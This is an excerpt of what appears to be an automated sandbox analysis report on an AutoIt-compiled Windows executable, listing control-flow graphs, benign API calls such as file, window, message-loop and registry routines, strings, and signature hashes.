7ff7c0e6eb2e-7ff7c0e6ebc4 call 7ff7c0e539bc call 7ff7c0e5a07c call 7ff7c0e545c8 * 2 call 7ff7c0e5a07c * 3 call 7ff7c0e613e0 call 7ff7c0e6ee68 call 7ff7c0e6ee2c * 3 254->273 274 7ff7c0e6eb24-7ff7c0e6eb29 call 7ff7c0e74c24 254->274 266 7ff7c0eb290a-7ff7c0eb2919 call 7ff7c0ec3a78 263->266 265->253 272 7ff7c0eb291b 266->272 277 7ff7c0eb2920-7ff7c0eb292f call 7ff7c0e6e4e4 272->277 273->266 316 7ff7c0e6ebca-7ff7c0e6ebdc call 7ff7c0e539bc 273->316 274->273 283 7ff7c0eb2931 277->283 286 7ff7c0eb2936-7ff7c0eb2945 call 7ff7c0ed3078 283->286 293 7ff7c0eb2947 286->293 295 7ff7c0eb294c-7ff7c0eb295b call 7ff7c0ed31a8 293->295 301 7ff7c0eb295d 295->301 304 7ff7c0eb2962-7ff7c0eb2971 call 7ff7c0ed31a8 301->304 310 7ff7c0eb2973 304->310 310->310 316->277 319 7ff7c0e6ebe2-7ff7c0e6ebec 316->319 319->286 320 7ff7c0e6ebf2-7ff7c0e6ec08 call 7ff7c0e5a07c 319->320 323 7ff7c0e6ec0e-7ff7c0e6ec18 320->323 324 7ff7c0e6ed20-7ff7c0e6ed25 call 7ff7c0e74c24 320->324 326 7ff7c0e6ec8a-7ff7c0e6eca9 call 7ff7c0e5a07c call 7ff7c0e74c24 323->326 327 7ff7c0e6ec1a-7ff7c0e6ec24 323->327 324->190 337 7ff7c0e6ecab 326->337 327->295 330 7ff7c0e6ec2a-7ff7c0e6ec3b 327->330 330->304 332 7ff7c0e6ec41-7ff7c0e6ed71 call 7ff7c0e5a07c * 3 call 7ff7c0e6ee10 call 7ff7c0e6ed8c 330->332 347 7ff7c0e6ed77-7ff7c0e6ed88 332->347 348 7ff7c0eb2978-7ff7c0eb2987 call 7ff7c0edd794 332->348 337->327 351 7ff7c0eb2989 348->351 351->351
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                      • String ID: close all
                                                                      • API String ID: 1992507300-3243417748
                                                                      • Opcode ID: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                      • Instruction ID: 6f3dfe103c2f5224412cf4ef44832ee9a4e4b147b5ae43eb073a25858b0d46bb
                                                                      • Opcode Fuzzy Hash: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                      • Instruction Fuzzy Hash: 02E17F25B89A4681EE58FF16D56027CA320BF84B64F984535CB0E973D1DF3CF86287A4

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: AutoIt v3
                                                                      • API String ID: 423443420-1704141276
                                                                      • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                      • Instruction ID: 6a61113b772dc9684281b236f2c621148f0eb31c392c6e8f54786523efce2ec4
                                                                      • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                      • Instruction Fuzzy Hash: 4731EA36A0CB018AE740EF91E8547697774BB44B68F900539CE8D97764DF7CE19487A0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 419 7ff7c0e97348-7ff7c0e973ba call 7ff7c0e97078 422 7ff7c0e973d3-7ff7c0e973dd call 7ff7c0e8e418 419->422 423 7ff7c0e973bc-7ff7c0e973c4 call 7ff7c0e855b4 419->423 429 7ff7c0e973df-7ff7c0e973f5 call 7ff7c0e855b4 call 7ff7c0e855d4 422->429 430 7ff7c0e973f7-7ff7c0e97463 CreateFileW 422->430 428 7ff7c0e973c7-7ff7c0e973ce call 7ff7c0e855d4 423->428 443 7ff7c0e9771a-7ff7c0e97736 428->443 429->428 433 7ff7c0e97469-7ff7c0e97470 430->433 434 7ff7c0e974eb-7ff7c0e974f6 GetFileType 430->434 435 7ff7c0e97472-7ff7c0e97476 433->435 436 7ff7c0e974b8-7ff7c0e974e6 GetLastError call 7ff7c0e85564 433->436 438 7ff7c0e974f8-7ff7c0e97533 GetLastError call 7ff7c0e85564 CloseHandle 434->438 439 7ff7c0e97549-7ff7c0e9754f 434->439 435->436 441 7ff7c0e97478-7ff7c0e974b6 CreateFileW 435->441 436->428 438->428 454 7ff7c0e97539-7ff7c0e97544 call 7ff7c0e855d4 438->454 446 7ff7c0e97551-7ff7c0e97554 439->446 447 7ff7c0e97556-7ff7c0e97559 439->447 441->434 441->436 451 7ff7c0e9755e-7ff7c0e975ac call 7ff7c0e8e334 446->451 447->451 452 7ff7c0e9755b 447->452 457 7ff7c0e975c0-7ff7c0e975ea call 7ff7c0e96de4 451->457 458 7ff7c0e975ae-7ff7c0e975ba call 7ff7c0e97284 451->458 452->451 454->428 466 7ff7c0e975ec 457->466 467 7ff7c0e975fe-7ff7c0e97643 457->467 464 7ff7c0e975ef-7ff7c0e975f9 call 7ff7c0e904b8 458->464 465 7ff7c0e975bc 458->465 464->443 465->457 466->464 469 7ff7c0e97665-7ff7c0e97671 467->469 470 7ff7c0e97645-7ff7c0e97649 467->470 472 7ff7c0e97677-7ff7c0e9767b 469->472 473 7ff7c0e97718 469->473 470->469 471 7ff7c0e9764b-7ff7c0e97660 470->471 471->469 472->473 475 7ff7c0e97681-7ff7c0e976c9 CloseHandle CreateFileW 472->475 473->443 476 7ff7c0e976cb-7ff7c0e976f9 GetLastError call 7ff7c0e85564 call 7ff7c0e8e548 475->476 477 7ff7c0e976fe-7ff7c0e97713 475->477 476->477 477->473
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                      • String ID:
                                                                      • API String ID: 1617910340-0
                                                                      • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                      • Instruction ID: 99fce5044795ddc0eae7d346abeae05cfee0a3f7bb94c935ca8d8086c504d361
                                                                      • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                      • Instruction Fuzzy Hash: 2CC1EF33B28A418AEB50EF65D4413AC7761EB49BA8F411235DE6E9B3D5CF38E055C390

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 557 7ff7c0e625bc-7ff7c0e6263d 561 7ff7c0e6287e-7ff7c0e628af 557->561 562 7ff7c0e62643-7ff7c0e6267c 557->562 564 7ff7c0e62680-7ff7c0e62687 562->564 565 7ff7c0e6268d-7ff7c0e626a1 564->565 566 7ff7c0e62856-7ff7c0e62876 564->566 568 7ff7c0e626a7-7ff7c0e626bc 565->568 569 7ff7c0ead148-7ff7c0ead14f 565->569 566->561 572 7ff7c0e629c8-7ff7c0e629eb PeekMessageW 568->572 573 7ff7c0e626c2-7ff7c0e626c9 568->573 570 7ff7c0ead155 569->570 571 7ff7c0e62702-7ff7c0e62723 569->571 582 7ff7c0ead15a-7ff7c0ead160 570->582 586 7ff7c0e6276e-7ff7c0e627d2 571->586 587 7ff7c0e62725-7ff7c0e6272c 571->587 575 7ff7c0e626e8-7ff7c0e626ef 572->575 576 7ff7c0e629f1-7ff7c0e629f5 572->576 573->572 577 7ff7c0e626cf-7ff7c0e626d4 573->577 579 7ff7c0eae285-7ff7c0eae293 575->579 580 7ff7c0e626f5-7ff7c0e626fc 575->580 583 7ff7c0e629fb-7ff7c0e62a05 576->583 584 7ff7c0ead1aa-7ff7c0ead1bb 576->584 577->572 578 7ff7c0e626da-7ff7c0e626e2 GetInputState 577->578 578->572 578->575 585 7ff7c0eae29d-7ff7c0eae2b5 call 7ff7c0e6f1c4 579->585 580->571 580->585 588 7ff7c0ead162-7ff7c0ead176 582->588 589 7ff7c0ead19b 582->589 583->582 590 7ff7c0e62a0b-7ff7c0e62a1d call 7ff7c0e72de8 583->590 584->575 585->566 626 7ff7c0e627d8-7ff7c0e627da 586->626 627 7ff7c0eae276 586->627 587->586 591 7ff7c0e6272e-7ff7c0e62738 587->591 588->589 592 7ff7c0ead178-7ff7c0ead17f 588->592 589->584 605 7ff7c0e62a33-7ff7c0e62a4f PeekMessageW 590->605 606 7ff7c0e62a1f-7ff7c0e62a2d TranslateMessage DispatchMessageW 590->606 596 7ff7c0e6273f-7ff7c0e62742 591->596 592->589 597 7ff7c0ead181-7ff7c0ead190 TranslateAcceleratorW 592->597 602 7ff7c0e62748 596->602 603 7ff7c0e628b0-7ff7c0e628b7 596->603 597->590 604 7ff7c0ead196 597->604 608 7ff7c0e6274f-7ff7c0e62752 602->608 609 7ff7c0e628eb-7ff7c0e628ef 603->609 610 7ff7c0e628b9-7ff7c0e628cc timeGetTime 603->610 604->605 605->575 611 7ff7c0e62a55 605->611 606->605 613 7ff7c0e62758-7ff7c0e62761 608->613 614 7ff7c0e628f4-7ff7c0e628fb 608->614 609->596 615 7ff7c0ead2ab-7ff7c0ead2b0 610->615 616 7ff7c0e628d2-7ff7c0e628d7 610->616 611->576 620 7ff7c0e62767 613->620 621 7ff7c0ead4c7-7ff7c0ead4ce 613->621 618 7ff7c0ead2f8-7ff7c0ead303 614->618 619 7ff7c0e62901-7ff7c0e62905 614->619 622 7ff7c0e628dc-7ff7c0e628e5 615->622 623 7ff7c0ead2b6 615->623 616->622 624 7ff7c0e628d9 616->624 628 7ff7c0ead305 618->628 629 7ff7c0ead309-7ff7c0ead30c 618->629 619->608 620->586 622->609 625 7ff7c0ead2bb-7ff7c0ead2f3 timeGetTime call 7ff7c0e72ac0 call 7ff7c0ed3a28 622->625 623->625 624->622 625->609 626->627 631 7ff7c0e627e0-7ff7c0e627ee 626->631 627->579 628->629 632 7ff7c0ead312-7ff7c0ead319 629->632 633 7ff7c0ead30e 629->633 631->627 635 7ff7c0e627f4-7ff7c0e62819 631->635 636 7ff7c0ead322-7ff7c0ead329 632->636 637 7ff7c0ead31b 632->637 633->632 639 7ff7c0e6290a-7ff7c0e6290d 635->639 640 7ff7c0e6281f-7ff7c0e62829 call 7ff7c0e62b70 635->640 641 7ff7c0ead332-7ff7c0ead33d call 7ff7c0e742a0 636->641 642 7ff7c0ead32b 636->642 637->636 644 7ff7c0e6290f-7ff7c0e6291a call 7ff7c0e62e30 639->644 645 7ff7c0e62931-7ff7c0e62933 639->645 652 7ff7c0e6282e-7ff7c0e62836 640->652 641->602 642->641 644->652 650 7ff7c0e62935-7ff7c0e62949 call 7ff7c0e666c0 645->650 651 7ff7c0e62971-7ff7c0e62974 645->651 664 7ff7c0e6294e-7ff7c0e62950 650->664 657 7ff7c0e6297a-7ff7c0e62997 call 7ff7c0e601a0 651->657 658 7ff7c0eadfbe-7ff7c0eadfc0 651->658 655 7ff7c0e6283c 652->655 656 7ff7c0e6299e-7ff7c0e629ab 652->656 665 7ff7c0e62840-7ff7c0e62843 655->665 660 7ff7c0eae181-7ff7c0eae197 call 7ff7c0e74c24 * 2 656->660 661 7ff7c0e629b1-7ff7c0e629be call 7ff7c0e74c24 656->661 666 7ff7c0e6299c 657->666 662 7ff7c0eadfc2-7ff7c0eadfc5 658->662 663 7ff7c0eadfed-7ff7c0eadff6 658->663 660->627 661->572 662->665 669 7ff7c0eadfcb-7ff7c0eadfe7 call 7ff7c0e63c20 662->669 670 7ff7c0eae005-7ff7c0eae00c 663->670 671 7ff7c0eadff8-7ff7c0eae003 663->671 664->652 672 7ff7c0e62956-7ff7c0e62966 664->672 673 7ff7c0e62b17-7ff7c0e62b1d 665->673 674 7ff7c0e62849-7ff7c0e62850 665->674 666->664 669->663 679 7ff7c0eae00f-7ff7c0eae016 call 7ff7c0ee8b98 670->679 671->679 672->652 680 7ff7c0e6296c 672->680 673->674 675 7ff7c0e62b23-7ff7c0e62b2d 673->675 674->564 674->566 675->569 689 7ff7c0eae0d7-7ff7c0eae0d9 679->689 690 7ff7c0eae01c-7ff7c0eae036 call 7ff7c0ed34e4 679->690 684 7ff7c0eae0f4-7ff7c0eae10e call 7ff7c0ed34e4 680->684 691 7ff7c0eae110-7ff7c0eae11d 684->691 692 7ff7c0eae147-7ff7c0eae14e 684->692 693 7ff7c0eae0df-7ff7c0eae0ee call 7ff7c0eea320 689->693 694 7ff7c0eae0db 689->694 703 7ff7c0eae06f-7ff7c0eae076 690->703 704 7ff7c0eae038-7ff7c0eae045 690->704 698 7ff7c0eae11f-7ff7c0eae130 call 7ff7c0e74c24 * 2 691->698 699 7ff7c0eae135-7ff7c0eae142 call 7ff7c0e74c24 691->699 692->674 700 7ff7c0eae154-7ff7c0eae15a 692->700 693->684 694->693 698->699 699->692 700->674 701 7ff7c0eae160-7ff7c0eae169 700->701 701->660 703->674 710 7ff7c0eae07c-7ff7c0eae082 703->710 707 7ff7c0eae047-7ff7c0eae058 call 7ff7c0e74c24 * 2 704->707 708 7ff7c0eae05d-7ff7c0eae06a call 7ff7c0e74c24 704->708 707->708 708->703 710->674 715 7ff7c0eae088-7ff7c0eae091 710->715 715->689
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 3249950245-0
                                                                      • Opcode ID: cada76aaec2e95197ea9794318e9bab72f6b91bcd410f9b5cf757f28c90778f0
                                                                      • Instruction ID: 6e9faa3366f07ffd9c9b38a0ab93dddfad6383c2890d81f1bdc3b19ba83c7ba2
                                                                      • Opcode Fuzzy Hash: cada76aaec2e95197ea9794318e9bab72f6b91bcd410f9b5cf757f28c90778f0
                                                                      • Instruction Fuzzy Hash: F3228E36A4CA8686EB64BF20E4443F9A7A0EB45B64F944135CB4E83795CF7CF484C7A0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 849 7ff7c0e53cbc-7ff7c0e53d88 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$Show
                                                                      • String ID: AutoIt v3$d$edit
                                                                      • API String ID: 2813641753-2600919596
                                                                      • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                      • Instruction ID: 268bfd0cf2984ca2de12482352fd28e3b11e412fec651a54609444cc6f00dfc1
                                                                      • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                      • Instruction Fuzzy Hash: 03212172A2CB4186EB50DF50F44872AB7A0F7487A9F504238DA8D86764CFBDE185CB54

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72D8E
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72D9C
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DAC
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DBC
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DCA
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DD8
                                                                        • Part of subcall function 00007FF7C0E6EEC8: RegisterWindowMessageW.USER32 ref: 00007FF7C0E6EF76
                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E5106D), ref: 00007FF7C0E58209
                                                                      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E5106D), ref: 00007FF7C0E5828F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E5106D), ref: 00007FF7C0E9D36A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: AutoIt
                                                                      • API String ID: 1986988660-2515660138
                                                                      • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                      • Instruction ID: 0e16cb32c2ba4d5db6af390b3734e01afec76ecc338e240fbe2185eb80373479
                                                                      • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                      • Instruction Fuzzy Hash: BAC1B031D5CB4685E640FF94A9808B8B7A8BF94360F95023ADD4D82761EF7CB194CBE0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3135491444-1585850449
                                                                      • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                      • Instruction ID: 0b89610ef2c91f842f37cb32d5a027332773456eac83754d5a15d66ce39c18f3
                                                                      • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                      • Instruction Fuzzy Hash: 0E416661A4CA4296E720FF21E4402F9A361FB85368FD45431DA8C8679ADF7CF694C7E0
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF7C0E9BAA2
                                                                        • Part of subcall function 00007FF7C0E556D4: GetFullPathNameW.KERNEL32(?,00007FF7C0E556C1,?,00007FF7C0E57A0C,?,?,?,00007FF7C0E5109E), ref: 00007FF7C0E556FF
                                                                        • Part of subcall function 00007FF7C0E53EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7C0E53ED8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                      • API String ID: 779396738-2360590182
                                                                      • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                      • Instruction ID: 2d90bc1f10d3479e71858dbd03cb67b111140e7a106513a034277a02530f77b4
                                                                      • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                      • Instruction Fuzzy Hash: 4A316F72608B8185E710EF21E8401A9B7A4FB49B94F944135DE8C87B56DF7CE545C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3812282468-0
                                                                      • Opcode ID: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                      • Instruction ID: 173f92e315abb297fec046f1aff499d2cb92733c19227df1eb6384c66733da57
                                                                      • Opcode Fuzzy Hash: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                      • Instruction Fuzzy Hash: 3E31C462A4CB9287EB61AF119044279BB98E745F98F9C4032DE8C47745CF2CE644C7B0
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0E56F52,?,?,?,?,?,?,00007FF7C0E5782C), ref: 00007FF7C0E56FA5
                                                                      • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0E56F52,?,?,?,?,?,?,00007FF7C0E5782C), ref: 00007FF7C0E56FD3
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0E56F52,?,?,?,?,?,?,00007FF7C0E5782C), ref: 00007FF7C0E56FFA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
